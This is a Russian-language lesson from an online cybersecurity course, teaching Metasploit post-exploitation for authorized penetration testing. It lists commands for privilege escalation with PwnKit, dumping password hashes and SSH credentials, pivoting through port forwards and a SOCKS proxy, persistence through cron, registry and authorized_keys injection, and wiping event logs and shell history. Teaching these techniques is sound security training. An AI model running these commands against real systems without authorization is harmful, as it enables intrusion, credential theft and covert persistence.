0Pricing
Cyber Security Academy · Урок

Постэксплуатация: перемещение и закрепление

Используйте постэксплуатационные модули Metasploit для повышения привилегий, извлечения учётных данных и закрепления.

«Постэксплуатация: перемещение и закрепление» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 4 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Цели постэксплуатации

После получения первоначального доступа цели атакующего таковы: повысить привилегии, собрать сведения, сохранить постоянный доступ и перемещаться по сети, чтобы достичь истинной цели (данных, систем или контроля домена).

Ситуационная осведомлённость

Первые действия после получения оболочки: поймите, где вы находитесь. Соберите сведения о системе и конфигурации сети, текущих привилегиях пользователя, запущенных процессах и переменных среды.

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_system

Повышение привилегий

Локальное повышение привилегий переводит оболочку с низкими привилегиями к правам суперпользователя или SYSTEM. local_exploit_suggester в Metasploit определяет подходящие эксплойты ядра и локальные эксплойты на основе версии OS цели.

meterpreter > run post/multi/recon/local_exploit_suggester

# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > run

Сбор учётных данных

Собирайте учётные данные: хешированные пароли, учётные данные в открытом виде в конфигурационных файлах, сохранённые пароли браузеров и ключи SSH. Они обеспечивают боковое перемещение и сохранение доступа.

meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds

# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/env

Перемещение через промежуточный узел: перенаправление портов

Перемещение через промежуточный узел использует скомпрометированный узел как мост для доступа к изолированным внутренним сетям. portfwd в Metasploit создаёт локальные перенаправления портов через сеанс Meterpreter.

# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20

# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u root

Маршрутизация через сеансы

Модуль маршрутизации Metasploit добавляет сетевые маршруты через сеанс, позволяя другим модулям обращаться к сетям, доступным только через узел-посредник.

msf6 > route add 10.10.10.0/24 1   # route via session 1
msf6 > route print

# Now run modules targeting 10.10.10.x
# through session 1 as pivot

Перемещение через прокси SOCKS

Прокси SOCKS через Metasploit (или chisel/ssh -D) позволяет направлять произвольные инструменты через узел-посредник с помощью proxychains, благодаря чему nmap, curl и браузеры могут обращаться к внутренним сетям.

# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j

# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24

Механизмы сохранения доступа

Сохранение доступа обеспечивает его восстановление после перезагрузок и потери сеанса. Распространённые методы: задания cron (Linux), ключи запуска в реестре (Windows), внедрение ключей в authorized_keys SSH и установка служб.

# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence

# Windows: registry
meterpreter > run post/windows/manage/persistence_exe

# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Сокрытие следов

Атакующие очищают журналы, чтобы сохранять незаметность. Важное замечание для безопасности: современные решения SIEM и EDR передают журналы на внешние узлы в реальном времени — очистка локальных журналов не удаляет централизованные записи.

meterpreter > clearev          # clear Windows event logs

# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_history

Модули постэксплуатации

Metasploit включает сотни модулей постэксплуатации для Windows и Linux: сбор учётных данных, получение данных браузеров, перехват нажатий клавиш, создание снимков экрана и сбор сведений о сети.

msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > run

Когда нужно остановиться

В рамках санкционированных тестов на проникновение остановитесь, когда достигнете цели, согласованной в рамках работ, или столкнётесь с данными, к которым у вас нет разрешения на доступ. Тщательно документируйте свой путь — именно эту цепочку атаки вы представляете в отчёте.

Быстрая проверка

Что позволяет выполнить команда Metasploit «route add»?

Итоги: постэксплуатация

Постэксплуатация развивает первоначальный доступ, чтобы добиться реального воздействия: повысить привилегии, собрать учётные данные, перемещаться по сети и сохранить доступ. Metasploit предоставляет модули постэксплуатации для каждого этапа. Документируйте каждый шаг — цепочка атаки от проникновения до цели является основным результатом тестирования на проникновение.

Часто задаваемые вопросы

Урок «Постэксплуатация: перемещение и закрепление» бесплатный?

Да — полный текст урока «Постэксплуатация: перемещение и закрепление» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Постэксплуатация: перемещение и закрепление»?

Используйте постэксплуатационные модули Metasploit для повышения привилегий, извлечения учётных данных и закрепления. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 4 из 4.

Сколько времени занимает урок «Постэксплуатация: перемещение и закрепление»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Архитектура Metasploit и msfconsole
  2. Эксплуатация известной уязвимости
  3. Полезные нагрузки: поэтапные и цельные, Meterpreter
  4. Постэксплуатация: перемещение и закрепление
← Назад к Cyber Security Academy